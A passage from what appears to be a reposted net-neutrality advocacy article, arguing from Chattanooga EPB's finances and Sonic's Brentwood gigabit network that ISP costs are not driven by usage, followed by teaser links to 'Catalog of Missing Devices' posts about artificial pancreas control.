from making the money they need to deploy high-speed affordable Internet. EPB Fiber Optics, a community broadband company run by Chattanooga, Tennessee, offers both gigabit broadband and 10-gigabit broadband as well. A decade of their financial information, including how much they invest, how much the network costs, and how much profit they are making, is available here. Here is what the data demonstrates in regards to the scalability of fiber optic cable and why ISPs are misleading policymakers when they assert that Internet usage or high bandwidth applications drive their costs. At the launch of its gigabit broadband service in 2009, EPB started in the red with capital expenditures (money spent on purchasing equipment and improving infrastructure) and operating expenses (maintaining and running the network) far above the revenue. But once they had about 35,000 customers, the network became profitable (all while following network neutrality and not monetizing the personal information of their customers). In the years that followed, the revenue gained from adding new customers far outpaced their maintenance costs and money spent upgrading their network. It is almost impossible to detect the increased spending EPB underwent to upgrade to a 10-gigabit network in 2016. Often ISPs blame companies like Netflix for driving their costs, yet there is no evidence that increased consumption by the customers of EPB resulted in an increase in their costs that wasn’t already more than compensated by their $50-$70 a month charge. If it was true that high bandwidth applications incurred uniquely high costs to ISPs, then the revenue line would not be outpacing the operating expenses line year after year of growth as online video consumption grew. Those lines would have to be moving closer together. EPB is able to deploy a 21st Century ISP with the world’s fastest service with just 90,000 customers today while following network neutrality and forgoing extra profits from monetizing personal information like web browsing history. Meanwhile, Comcast sits on about 25 million customers and made $8.6 billion in profits for 2016 (and this was before Congress cut the corporate tax rates). At the same time, both AT&T and Verizon each collected around $13 billion each in profits for 2016. Charging Low Prices for Huge Amounts of Bandwidth Is Not Exclusively Reserved for Community Broadband Being able to provide affordable high-speed Internet for a profit while respecting network neutrality and user privacy is something the competitors to the incumbents have repeatedly demonstrated.  Take regional provider Sonic for an example and their Brentwood, California deployment where the city’s infrastructure policies eliminated a majority of the costs of building the ISP. Right now Sonic sells gigabit broadband in the city of Brentwood at $40 a month, one of the lowest priced offerings for gigabit service. Again, they are doing this for a profit all while following network neutrality and protecting their customers’ privacy (Sonic regularly supports laws codifying their commitments as well).  The provisioning of the service is not the expensive part of an ISPs business, and the usage of Internet access is not an unsustainable cost driver. If one would to properly diagnose the most efficient way to reduce ISP costs, they would look towards city planning and learn from Brentwood. The Sonic gigabit network all came about because in 1999 the city adopted a building code conduit requirement for all new development. The code required developers to build a 4-inch conduit pipe and then deed it back to the city. The policy goal at the time was to lay infrastructure with the hope of franchising a second cable television provider. However, no new cable company arrived and the city-owned nearly 120 to 150 miles of unused conduit reaching 8,000 homes and commercial zones built since 1999. In response to the proposal by Sonic to utilize the infrastructure, the city issued a Request for Expression of Interest (RFEI) highlighting the available conduit to the companies Astound, AT&T, Comcast, Google, Level 3, Lit San Leandro, XO Communications, and Sonic. However, the only respondent to the RFEI was Sonic and so the city chose them to deploy the network, which was so lucrative an agreement that Sonic agreed to provide the local schools within the conduit network free gigabit service among other things while still making money. We Already Pay More Than Enough to Get High-Speed, Affordable Internet Where Our Privacy is Protected and Net Neutrality is Preserved The fact is, more than half of Americans have one choice for high-speed broadband and the incumbents know they can rest on their legacy investments to maximize profits until they face competition from other broadband providers. They don’t have to make their service better or faster, because most of their customers have to choose between them or nothing. They worked so hard to repeal our privacy protections and repeal net neutrality because since so many of us lack choice in the market they can start increasing their profits and give nothing to the consumer in return. No regulations banning paid prioritization have prevented them from upgrading their network. We see this in both Chattanooga’s EPB and Brentwood’s Sonic, which operate perfectly well while following network neutrality and have forgoing extra profits from monetizing our personal information. Net neutrality ensures that ISPs are prevented from harming the competition they face from edge providers (particularly video providers that compete with television such Hulu, Netflix, and Amazon) as well as preserve the innovation benefits an open Internet yields. It also prohibits them from charging unjustified fees on Internet services that will do nothing to improve the Internet but will do real harm to the free and open nature of the network we have enjoyed for decades.
>> mehr lesen

Catalog of Missing Devices: Artificial Pancreas Triptych 3, It's My Pancreas (Fr, 04 Mai 2018)
Kids are often the involuntary early adopters of controlling, abusive technology, whether that's spying school laptops, location tracking phones apps, or teenager-repelling buzzers that emit tones that adult ears can't hear. If you want to see your future, look at what we're doing to the kids.
>> mehr lesen

Catalog of Missing Devices: Artificial Pancreas Triptych 2, GlycemiControl (Fr, 04 Mai 2018)
Kids are often the involuntary early adopters of controlling, abusive technology, whether that's spying school laptops, location tracking phones apps, or teenager-repelling buzzers that emit tones that adult ears can't hear. If you want to see your future, look at what we're doing to the kids around you.
>> mehr lesen

Catalog of Missing Devices: Artificial Pancreas Triptych 1, SugarSafe (Fr, 04 Mai 2018)
As we move from having computers in our pockets to computers on our skin to computers inside our body, whether we use computers becomes less voluntary, and who gets to control those computers gets more critical.
>> mehr lesen